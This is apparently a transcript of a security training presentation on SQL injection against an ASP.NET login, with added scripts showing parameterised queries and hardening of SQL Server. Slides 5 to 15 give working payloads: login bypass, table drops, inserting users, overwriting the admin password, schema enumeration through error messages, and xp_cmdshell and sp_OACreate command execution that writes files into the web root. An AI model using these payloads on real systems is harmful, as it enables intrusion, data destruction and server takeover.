Security.NET Chapter 2: SQL Injection (presentation transcript)


1 Security.NET Chapter 2

2 SQL Injection
A form of a script injection attack
Malicious user input is used to alter the SQL script that is executed

3 Example Table
    CREATE TABLE [dbo].[users] (
        [id] [int] NOT NULL,
        [uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL,
        [pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL,
        [priv] [int] NULL
    ) ON [PRIMARY]

4 Example code
    sqlConnection1.Open();
    // Vulnerable: both textbox values are pasted straight into the statement text,
    // so whatever the user types becomes part of the SQL that runs
    sqlCommand1.CommandText = "select * from users where uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'";
    SqlDataReader d = sqlCommand1.ExecuteReader();
    // Any row at all counts as a successful login
    if (d.HasRows == true)
        Response.Redirect("ok.aspx");
    else
        Response.Redirect("error.aspx");
    // Not reached in Web Forms: Response.Redirect(url) ends the request, so the
    // reader and connection are never closed here
    d.Close();
    sqlConnection1.Close();

5 Bypass the check
In the user textbox type:
    ' or 1=1 --
The quote closes the uname literal, "or 1=1" makes the WHERE clause true for every row, and "--" comments out the rest of the statement, including the password check.
You can also drop a table, because a second statement can be stacked after the first:
    '; drop table t1; --

6 Find the table structure
    ' having 1=1--
You get the error:
    Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
The error message names the first column of the table that "select *" expands to:
Table name: users
Column: id

7 Table structure
Add each column the server has already revealed to a GROUP BY; the next error names the next column, and the query stops failing once the list is complete:
    ' group by users.id having 1=1--
    ' group by users.id, users.uname having 1=1--
    ' group by users.id, users.uname, users.pass having 1=1--
    ' group by users.id, users.uname, users.pass, users.priv having 1=1--

8 Data types
    ' union select sum(id) from users--
    ' union select sum(uname) from users--
    ' union select sum(pass) from users--
    ' union select sum(priv) from users--
sum() is type-checked before the UNION column counts are compared: on a string column the error names the column's data type, while on a numeric column the query fails later with the "equal number of expressions" UNION error, which tells you the column is numeric.

9 Create a new user
    '; insert users values(5,'hacker','pass',1); --
You can also update the administrator password, for example:
    '; update users set pass='12345' where uname='admin'; --
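The following T-SQL script is an added example, not code from the slides. It builds a scratch copy of the slide 3 table as a temp table named #users with two constructed rows, then builds the slide 4 login query two ways: by string concatenation, exactly as the C# does, and through sp_executesql with parameters, which is what a SqlCommand carrying SqlParameters sends to the server. The slide 5 and slide 9 payloads are replayed against both so the difference is visible in the result sets. The payload on slide 9 is used unchanged apart from the table name.

```sql
-- Added example; not code from the slides. Constructed data in a temp table.
SET NOCOUNT ON;

CREATE TABLE #users (
    id    int          NOT NULL,
    uname varchar(255) NULL,
    pass  varchar(255) NULL,
    priv  int          NULL
);
INSERT INTO #users (id, uname, pass, priv)
VALUES (1, 'admin', 'S3cret!', 1),
       (2, 'bob',   'hunter2', 0);

DECLARE @u   nvarchar(255),   -- what was typed into TextBox1
        @p   nvarchar(255),   -- what was typed into TextBox2
        @sql nvarchar(max);

-- Payload 1 (slide 5), typed into the user textbox.
SET @u = N''' or 1=1 --';
SET @p = N'wrong';

-- Vulnerable: the textbox values become part of the statement text.
SET @sql = N'select * from #users where uname=''' + @u + N''' and pass=''' + @p + N'''';
PRINT @sql;
-- resolves to: select * from #users where uname='' or 1=1 --' and pass='wrong'
EXEC (@sql);
-- Every row is returned, so the slide 4 HasRows test redirects to ok.aspx.

-- Fixed: the statement text is constant; the values travel as parameters.
SET @sql = N'select * from #users where uname=@uname and pass=@pass';
EXEC sp_executesql @sql,
     N'@uname varchar(255), @pass varchar(255)',
     @uname = @u, @pass = @p;
-- No rows: the server compared uname against the literal text "' or 1=1 --".

-- Payload 2 (slide 9): a second statement stacked after the first.
SET @u = N'''; update #users set pass=''12345'' where uname=''admin''; --';

-- Parameterised path first: still nothing but a comparison against an odd user name.
EXEC sp_executesql @sql,
     N'@uname varchar(255), @pass varchar(255)',
     @uname = @u, @pass = @p;
SELECT pass AS admin_pass_after_parameterised_query FROM #users WHERE uname = 'admin';
-- unchanged

-- Concatenated path: EXEC runs the whole batch, the stacked UPDATE included.
SET @sql = N'select * from #users where uname=''' + @u + N''' and pass=''' + @p + N'''';
PRINT @sql;
EXEC (@sql);
SELECT pass AS admin_pass_after_concatenated_query FROM #users WHERE uname = 'admin';
-- overwritten by the stacked update

DROP TABLE #users;
```

In the slide 4 C# the equivalent fix is to keep the CommandText constant with @uname and @pass placeholders and add the two textbox values through sqlCommand1.Parameters; the driver then issues the sp_executesql call shown above, so the quote and the "--" in the input never reach the parser as syntax. Escaping or filtering quotes in TextBox1.Text is not a substitute: it leaves the statement text under user control and has to be right for every data type and encoding.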

10 Error messages
Detailed database errors shown to the user give away too much information (slides 6 to 8 rely on them).
All system messages:
    select * from master..sysmessages

11 Extended S.P.
    ' exec master..xp_cmdshell 'calc' --
Use for a D.O.S. attack: every request starts another process on the database server.
Find the Windows users:
    ' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' --
The output is written under the web root, so it can then be fetched with a browser.

12 Registry XP
    xp_regaddmultistring
    xp_regdeletekey
    xp_regdeletevalue
    xp_regenumkeys
    xp_regenumvalues
    xp_regread
    xp_regremovemultistring
    xp_regwrite
Example:
    exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'

13 Other XP
    exec master..xp_servicecontrol 'start', 'schedule'
xp_availablemedia - reveals the available drives on the machine
xp_dirtree - allows a directory tree to be obtained
xp_enumdsn - enumerates ODBC data sources on the server
xp_loginconfig - reveals information about the security mode of the server
xp_terminate_process - terminates a process, given its PID

14 COM Components
T-SQL script (sp_OACreate instantiates a COM object inside the SQL Server process; sp_OAMethod calls a method on it):
    declare @o int
    exec sp_OACreate 'wscript.shell', @o out
    exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'
Browser:
    '; declare @o int exec sp_OACreate 'wscript.shell', @o out exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--

15 Dynamic ASP
The same COM route, with FileSystemObject, writes a new page into the web root:
    declare @o int, @f int, @t int, @ret int
    exec sp_OACreate 'scripting.filesystemobject', @o out
    exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
    exec @ret = sp_OAMethod @f, 'writeline', NULL, ' '
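Slides 11 to 15 all depend on server-side features that a web application's database login should not be able to reach. The following T-SQL script is an added example, not from the slides: it reads the current state of the two switches behind xp_cmdshell and the sp_OA* procedures, turns both off, lists who holds EXECUTE on the procedures the slides name, and then checks what the application's own login can do. It is meant to be run as a sysadmin on a scratch instance; the login name web_app is an assumption standing in for whatever the ASP.NET connection string actually uses.

```sql
-- Added example; not code from the slides. Run as sysadmin; 'web_app' is a
-- hypothetical login name for the account the ASP.NET application connects as.
USE master;

-- 1) Current state of the two switches behind xp_cmdshell and sp_OACreate.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures');

-- 2) Turn both off. They are "advanced" options, so expose them first and hide
--    them again afterwards.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3) Who holds EXECUTE on the procedures named on slides 11 to 15? Disabling the
--    switches stops xp_cmdshell and sp_OA*, but the registry and file-system
--    procedures are gated by EXECUTE permission alone.
SELECT o.name AS procedure_name,
       USER_NAME(dp.grantee_principal_id) AS grantee,
       dp.state_desc
FROM sys.database_permissions AS dp
JOIN sys.objects AS o ON o.object_id = dp.major_id
WHERE dp.class = 1                      -- object-level permissions only
  AND dp.permission_name = N'EXECUTE'
  AND o.name IN (N'xp_cmdshell', N'xp_regread', N'xp_regwrite', N'xp_dirtree',
                 N'xp_servicecontrol', N'xp_terminate_process',
                 N'sp_OACreate', N'sp_OAMethod')
ORDER BY o.name, grantee;

-- 4) The application's login. sysadmin membership, or EXECUTE on any of the
--    above, turns the slide 5 login bypass into the slide 11 command shell.
IF EXISTS (SELECT 1 FROM sys.server_principals WHERE name = N'web_app')
BEGIN
    SELECT name,
           IS_SRVROLEMEMBER('sysadmin', name) AS is_sysadmin
    FROM sys.server_principals
    WHERE name = N'web_app';

    -- Evaluate the permission checks as that login, then switch back.
    EXECUTE AS LOGIN = N'web_app';
    SELECT HAS_PERMS_BY_NAME(N'master.dbo.xp_cmdshell', N'OBJECT', N'EXECUTE') AS can_exec_xp_cmdshell,
           HAS_PERMS_BY_NAME(N'master.dbo.sp_OACreate', N'OBJECT', N'EXECUTE') AS can_exec_sp_OACreate,
           HAS_PERMS_BY_NAME(N'master.dbo.xp_regread', N'OBJECT', N'EXECUTE') AS can_exec_xp_regread;
    REVERT;
END
```

The intended end state is that every column in step 4 reads 0, the login appears nowhere in the step 3 grantee list, and the application connects with a login that has only the table permissions the pages need; the injection on slide 5 then still has to be fixed in the code, but a successful one no longer reaches the operating system.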

